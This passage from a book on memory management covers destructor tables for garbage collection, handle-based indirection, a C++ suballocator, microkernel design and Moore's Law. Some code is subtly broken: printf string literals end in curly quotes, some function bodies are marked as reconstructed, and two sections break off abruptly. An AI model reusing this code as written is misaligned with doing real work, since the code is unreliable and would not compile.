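//this single statement expands into the call to operator new
//followed by the call to BluePrint::BluePrint(int)
BluePrint *ptr = new BluePrint(15);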
If manual memory management is being used, the programmer will
include source code that will take care of reclaiming the object’s
storage in the heap.
delete(ptr);
As before, not only will the compiler emit the instructions neces-
sary to reclaim the object, but it will also emit the instructions
necessary to call the object’s destructor before reclamation occurs:
push 1
mov ecx, DWORD PTR $T200[ebp]
call ??_GBluePrint@@QAEPAXI@Z ; BluePrint::'scalar deleting destructor'
mov DWORD PTR -40+[ebp], eax
If a garbage collector is being used to manage reclamation, the pro-
grammer will never issue a call to delete(). This means that the
garbage collector will have to do this behind the scenes. In order to
obey this protocol, a memory manager will need to know which
memory blocks contain objects and which hold plain data. One way
to track this is to add a new field to each memory block's header, as
shown in Figure 5.11.
Figure 5.11
This new field, which we’ll call TYPE, indicates if the memory block
is an object, and if it is, then it indexes an element in an array of
function pointers. These function pointers store the addresses of
destructor functions. This setup is displayed in Figure 5.12.
Figure 5.12
If the TYPE field indicates that
the memory block is an object, the collector will invoke the object's
destructor before it reclaims the memory block’s storage.
Naturally, there are many more details to consider than I’ve men-
tioned, such as setting up the table of function pointers and handling
nested objects that call different destructors. You will have to exper-
iment with a number of different approaches. Nevertheless, I hope
to have guided you in the right direction.
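To make the arrangement in Figure 5.12 concrete, here is a minimal
sketch. The TYPE field, the table, and every name in it are
illustrative assumptions, not code from the manager presented
earlier:
#include<stdio.h>

typedef void (*Destructor)(void*);

//hypothetical destructor thunk for a BluePrint object
void destroyBluePrint(void *obj)
{
    printf("destroying BluePrint at %p\n",obj);
    return;
}

//TYPE==0 denotes plain data; nonzero values index this table
Destructor destructorTable[] = { NULL, destroyBluePrint };

struct BlockHeader
{
    unsigned long type;    //the TYPE field from Figure 5.11
};

//invoked by the collector just before a block's storage is released
void finalize(struct BlockHeader *hdr, void *block)
{
    if((*hdr).type!=0)
    {
        destructorTable[(*hdr).type](block);
    }
    return;
}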
Indirect Addressing
During the discussion of copying collection and memory realloca-
tion, you have seen how moving memory can make life difficult for
an application. The only solution that seems halfway tractable is to
traverse the application’s stack, heap, and data segment and update
the pointer values to reference new locations.
There is, however, a different approach. Rather than have point-
ers reference actual memory, you can have them store handles. A
handle could be implemented simply by a structure that maps an
integer handle value to a physical address:
struct MemHandle
{
unsigned long value;
void *ptr;
};
This would allow you to change the address of a memory block (i.e.,
void *ptr) without having to change the value stored by pointers
in the application (i.e., unsigned long value). When an
address change does occur, all you need to update is a single
MemHandle structure instead of potentially dozens of application
variables. This type of relationship is displayed in Figure 5.13.
Figure 5.13
When the stack hits its limit, the garbage collector kicks in and
reclaims garbage. To minimize fragmentation, the occupied blocks
are all shifted down to the bottom of the heap. Because handles are
being used instead of actual pointers, all the collector has to do
when it makes this shift is update all the handles. The application
variables can remain untouched.
This process is illustrated in Figure 5.14.
Figure 5.14
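Here is a minimal sketch of the indirection, using invented names
(handleTable, lookup(), relocate()); a production collector would
size and manage the table dynamically:
#include<string.h>

struct MemHandle
{
    unsigned long value;   //what the application stores
    void *ptr;             //where the block currently resides
};

//hypothetical fixed-size handle table
struct MemHandle handleTable[64];

//the application dereferences a handle instead of a raw pointer
void* lookup(unsigned long value)
{
    return(handleTable[value].ptr);
}

//when compaction moves a block, only the table entry changes;
//every application variable holding 'value' remains valid
void relocate(unsigned long value, void *newAddr, unsigned long nbytes)
{
    memmove(newAddr,handleTable[value].ptr,nbytes);
    handleTable[value].ptr = newAddr;
    return;
}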
Real-Time Behavior
With my mark-sweep collector, there was a noticeable decrease in
execution time when the frequency of garbage collection was
decreased. This might lead you to think that the best way to speed
up a garbage collector is simply to invoke it less often.
Figure 5.15
Multithreaded Support
All the implementations presented in this book have been single-
threaded; this was a conscious decision on my part in order to keep
things simple so that you could focus on the main ideas. The handi-
cap of using a single-threaded garbage collection scheme is that
reclamation is done on the critical path of execution.
I think that most garbage collection implementations assume a
multithreaded environment, one where reclamation can be shifted
off the critical path and into a thread of its own.
Figure 5.16
Chapter 6
Miscellaneous Topics
Suballocators
Normally, memory managers have to suffer through the slings and
arrows of not knowing when or how much memory will be
requested by an application. There are, however, some circum-
stances where you will know in advance how large an application’s
memory requests will be or how many there will be. If this is the
case, you can construct a dedicated memory manager known as a
suballocator to handle memory requests and reap tremendous per-
formance gains.
A suballocator is an allocator that is built on top of another alloca-
tor. An example of where suballocators could be utilized is in a
compiler. Specifically, one of the primary duties of a compiler is to
build a symbol table. Symbol tables are memory-resident databases
that catalog the identifiers in a program's source. They are typically
built using a set of fixed-size structures. The fact that a symbol
table’s components are all fixed in size makes a compiler fertile
ground for the inclusion of a suballocator. Instead of calling
malloc() to allocate symbol table objects, you can allocate a large
pool of memory and use a suballocator to allocate symbol table
objects from that pool.
Figure 6.1
struct Indices
{
U1 free;
U4 index1;
U4 index2;
U4 index3;
};
class SubAllocator
{
private:
struct Indices *indices;
U4 size;
U4 lastAlloc;
public:
SubAllocator(U4 nElms);
~SubAllocator();
struct Indices *alloc();
void release(struct Indices *addr);
void printList();
};
SubAllocator::SubAllocator(U4 nElms)
{
U4 i;
size = nElms;
indices = (struct Indices*)malloc(size*(sizeof(struct Indices)));
if(indices==NULL)
{
printf("SubAllocator::SubAllocator(%lu):",size);
printf("could not allocate list\n");
exit(1);
}
for(i=0;i<size;i++)
{
indices[i].free =TRUE;
}
lastAlloc = 0;
return;
}/*end constructor--------------------------------------------*/
SubAllocator::~SubAllocator()
{
free(indices);
return;
}/*end destructor---------------------------------------------*/
struct Indices* SubAllocator::alloc()
{
U4 i;
if(lastAlloc==size-1){ lastAlloc=0; }
for(i=lastAlloc;i<size;i++)
{
if(indices[i].free==TRUE)
{
indices[i].free=FALSE;
lastAlloc = i;
return(&indices[i]);
}
}
for(i=0;i<lastAlloc;i++)
{
if(indices[i].free==TRUE)
{
indices[i].free=FALSE;
lastAlloc = i;
return(&indices[i]);
}
}
return(NULL);
}/*end alloc--------------------------------------------------*/
void SubAllocator::release(struct Indices *addr)
{
//sanity check (body reconstructed): only addresses that fall
//within the indices[] array may be released
if( (addr>=&indices[0]) && (addr<=&indices[size-1]) )
{
(*addr).free=TRUE;
}
else
{
printf("SubAllocator::release(): bad address\n");
exit(1);
}
return;
}/*end release------------------------------------------------*/
void SubAllocator::printList()
{
U4 i;
for(i=0;i<size;i++)
{
if(indices[i].free==FALSE)
{
printf("indices[%lu] “,i);
printf("[%lu, “,indices[i].index1);
printf("%lu,",indices[i].index2);
printf("%lu]\n",indices[i].index3);
}
else
{
printf("indices[%lu]=FREE\n",i);
}
}
return;
}/*end printList----------------------------------------------*/
void main()
{
U4 ticks1,ticks2;
U4 nAllocations=1024;
U4 i;
SubAllocator *ptr;
struct Indices **addr;
//set-up (reconstructed; implied by the delete/free calls below):
//create the suballocator and an array to record each allocation
ptr = new SubAllocator(nAllocations);
addr = (struct Indices**)malloc(sizeof(struct Indices*)*nAllocations);
ticks1 = GetTickCount();
for(i=0;i<nAllocations;i++)
{
addr[i] = (*ptr).alloc();
if(addr[i]==NULL)
{
printf("addr[%lu]==NULL\n",i);
exit(1);
}
}
for(i=0;i<nAllocations;i++)
{
(*ptr).release(addr[i]);
}
ticks2 = GetTickCount();
delete(ptr);
free(addr);
printf("msecs=%lu\n",ticks2-ticks1);
return;
}/*end main---------------------------------------------------*/
Monolithic Versus
Microkernel Architectures
All of the operating systems that we looked at in Chapter 2 were
monolithic, which is to say that all the components of the operating
system (the task scheduler, the memory manager, the file system
manager, and the device drivers) exist in a common address space
and everything executes in kernel mode (at privilege level 0). In
other words, a monolithic operating system behaves like one big
program. UNIX, Linux, MMURTL, DOS, and Windows are all mono-
lithic operating systems.
Another approach to constructing an operating system is to use a
microkernel design. With a microkernel operating system, only a
small portion of the operating system functions in kernel mode.
Typically, this includes task scheduling, interrupt handling,
low-level device drivers, and a message-passing subsystem to pro-
vide interprocess communication primitives. The rest of the
operating system components, like the memory manager and the
file system manager, run as separate tasks in user space and com-
municate with each other using the kernel’s message passing
facilities. MINIX, Mach, and Chorus are examples of microkernel
operating systems.
The difference between monolithic and microkernel architectures
is displayed in Figure 6.2.
The researchers supporting the microkernel school of thought
claim that the enforcement of modular operating system compo-
nents provides a cleaner set of interfaces. This characteristic, in
turn, makes it easier to maintain and modify an operating system.
Operating systems are often judged with regard to how well they
accommodate change. The operating systems that tend to survive
are the ones that are easy to extend and enhance. By allowing core
components to be replaced and updated in isolation, the microkernel
approach aims to make this kind of evolution easier to achieve.
Figure 6.2
In other words, it is not exactly what you are building but how
you build it that makes the difference between success and failure.
Table 6.1 presents a comparison of monolithic and microkernel
design approaches.
Table 6.1
                 Monolithic                    Microkernel
Maintainability  complicated interaction       marginally better
Stability        kernel errors lead to crash   questionable isolation of errors
Performance      faster                        slower, messaging overhead
Security         everything in kernel mode     core components in user mode
Closing Thoughts
In 1965, Gordon Moore, who would later co-found Intel Corporation,
suggested that the number of transistors in a processor would double
every 18 months. This rule of thumb became known as Moore's
Law. Moore's Law implies that the linear dimensions of a transistor
are cut in half every three years (see Figure 6.3).
Figure 6.3
The diameter of a hydrogen atom, in its ground state, is roughly
one-tenth of a nanometer.
Solid-state physicists will tell you that an electron needs a path of
about three atoms wide to move from one point to another. If the
path width gets any smaller, quantum mechanics takes hold and the
electron stops behaving in a predictable manner.
In 1989, Intel released the 80486 processor. The 80486 had tran-
sistors whose linear dimensions were 1 micrometer. Using 1989 as
a starting point, let’s see how long Moore’s Law will last before it
hits the three-atom barrier.
Table 6.2
Year   Size (micrometers)   Processor
1989   1                    Intel 80486 (1 micrometer)
1992   0.5
1995   0.25                 Pentium Pro (.35 micrometers)
1998   0.125
2001   0.0625               Pentium 4 (.18 micrometers)
2004   0.03125
2007   0.015625
2010   0.0078125
2013   0.00390625
2016   0.001953125
2019   0.000976563
2022   0.000488281
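The projection in Table 6.2 is nothing more than repeated halving.
The short program below reproduces the table and stops at the
three-atom barrier, taken here to be roughly 0.0003 micrometers per
the hydrogen-atom estimate above:
#include<stdio.h>

void main()
{
    double size = 1.0;          //1 micrometer in 1989 (80486)
    double barrier = 0.0003;    //~3 hydrogen atoms, in micrometers
    int year;
    for(year=1989;size>=barrier;year=year+3)
    {
        printf("%d\t%.9f micrometers\n",year,size);
        size = size/2.0;        //linear dimensions halve every 3 years
    }
    return;
}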
For much of computing's early history, the hardware was woefully
inadequate for the problems that it faced. Take the Bendix G-15, for
example, which had 2,160 words of magnetic drum memory in 1961.
In order to squeeze every drop of performance out of a machine,
you needed to be able to make efficient use of limited resources.
Program size was typically the biggest concern. If instructions
existed in more than one spot, they were consolidated into a proce-
dure. This meant that the execution path of a task tended to spend a
lot of time jumping around memory. I remember two Control Data
engineers telling me about how they simulated an entire power grid
in southern California using less than 16KB of memory.
NOTE In 2002, with the advent of 256MB SDRAM chips and 512KB
L2 caches, program size is not such a pressing concern. Program
speed is the new focal issue. This has led to an inversion of program-
ming techniques. Instead of placing each snippet of redundant code in
its own function, developers have begun to deliberately insert redun-
dant instructions. For example, inline functions can be used to avoid
the overhead of setting up an activation record and jumping to
another section of code.
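As a sketch of the trade (function names invented for illustration):
//out-of-line version: every use pays for an activation record
//and a jump to another code address
int sum(int a, int b){ return(a+b); }

//inline version: the compiler may paste the body directly at each
//call site, duplicating instructions but skipping call/return overhead
inline int sumInline(int a, int b){ return(a+b); }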
When Moore’s Law meets the laws of physics, the computer indus-
try will once again be forced to look for better solutions that are
purely software-based, primarily because all the other alternatives
will be more expensive. One positive result of this is that the neces-
sity to improve performance will drive the discovery of superior
algorithms. Computer science researchers may see a new heyday.
The demise of Moore’s Law may also herald the arrival of less
desirable developments. Lest you forget, major technical advances,
such as radar and nuclear energy, were first put to use as weapons
of war. Potential abuse of technology has already surfaced, even in
this decade. At Super Bowl XXXV, hundreds of people involuntarily
took part in a virtual lineup performed by Face Recognition Soft-
ware. Is there a reason why people who wish to watch a football
game need to be treated like suspects in a criminal case? Why was
the public only informed about the use of this software after the
game had occurred?
This is just the beginning. Artificial intelligence programs will
eventually be just as sophisticated and creative as humans. To a cer-
tain extent, they already are. In 1997, an IBM RS/6000 box named
Deep Blue conquered the world chess champion, Garry Kasparov, in
a six-game match.
The source code for most of the examples in this book is provided in
a downloadable file available at www.wordware.com/memory.
When the file is unzipped, it will be organized into two folders:
deploy and meta-inf. The source code in the deploy folder is divided
into subfolders named for the chapters.